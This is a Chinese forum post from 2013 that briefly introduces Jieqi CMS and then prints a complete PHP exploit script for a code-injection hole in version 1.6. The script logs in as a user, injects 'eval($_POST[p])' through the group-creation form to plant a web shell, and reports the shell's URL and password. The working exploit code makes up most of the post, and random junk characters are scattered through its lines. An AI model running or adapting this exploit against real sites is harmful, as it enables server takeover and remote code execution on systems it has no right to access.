杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。6 F2 u d l+ z5 w7 e" g4 s( O
3 d3 d" i i/ c4 r' n W5 j4 w& `& b! N# P# a' Q
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。 N# j# S7 q4 q1 s% C0 r! A
需要有一个能创建圈子的用户。
, }* g) o. P p# z& |0 Q
. G$ Z9 c! N+ H3 u% {' d; t<?php5 t+ U( A) M- a. ^) W2 o9 Z; s
; G* ]' M' ]: `4 x0 w; }
print_r('
. C9 z2 o7 F8 {2 R+---------------------------------------------------------------------------+
/ Y' o" k, F$ W/ a7 r0 hJieqi CMS V1.6 PHP Code Injection Exploit& L, r, ?- E7 ]% D; a, t
by flyh4t8 s+ A% d* Q: e; W7 w
mail: phpsec at hotmail dot com% t+ V1 T) Q; L' N# b* H! R
team: http://www.wolvez.org
+ o# G9 q0 g; k; Z" `+---------------------------------------------------------------------------+
) z7 N5 {, @4 N$ ~! k" u8 U B/ K'); /**
: i1 N( k9 J7 H% h7 P% z * works regardless of php.ini settings& S, R- Y, z% L4 O6 e. o5 S
*/ if ($argc < 5) { print_r('
, p! T9 D( \8 {0 D: I6 q6 q1 z+---------------------------------------------------------------------------+4 i9 E0 i n9 P7 w3 \7 y% z
Usage: php '.$argv[0].' host path username
0 J1 x s% [3 I8 Ohost: target server (ip/hostname)) \, Y6 p# Z& D1 k7 l3 e
path: path to jieqicms
2 Q& Z/ R E+ ~: d5 ]+ duasename: a username who can create group
7 w1 |% o4 t4 D+ J8 |Example:4 _$ l3 d# r3 m3 b2 f. l: q
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
: ~% x1 e) _4 A( p+ e! f9 e$ [+---------------------------------------------------------------------------+
8 o5 b2 Q0 @- v: b; N5 z( V'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
6 r: y) W- k$ u7 @% IContent-Disposition: form-data; name="gname"# P% d1 U& Q5 S4 Q' ^( S
2 @. Z, l, U7 L7 u
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t9 g7 R* m( S0 D U2 J% |( r3 l
-----------------------------23281168279961
' a3 O3 l4 K! J: E) LContent-Disposition: form-data; name="gcatid"0 |4 H+ }/ u/ F$ x, e, Z1 P
, R9 ?' N8 ? E' B3 K* N
1
: T$ A$ X9 Y0 F. w" p-----------------------------23281168279961( _4 K# l( Y- m; l5 g
Content-Disposition: form-data; name="gaudit"2 T( S$ L8 k: v2 o3 W' N, _6 A
3 w6 ?* j) ]- |* y1- \9 h" ^7 d( O5 u
-----------------------------232811682799613 w u+ J x2 k6 j7 Q0 B
Content-Disposition: form-data; name="gbrief"$ W, ?4 |; s6 i+ L
3 j8 A# `2 v% d L7 {* M' w g# ?* O
1$ ~5 l9 a) {3 e- o' ]
-----------------------------23281168279961--! V6 V6 t8 n( t4 i/ {. X2 ~
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com# l! ?* V7 B, p( m M
3 o( P W0 u2 d. }preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对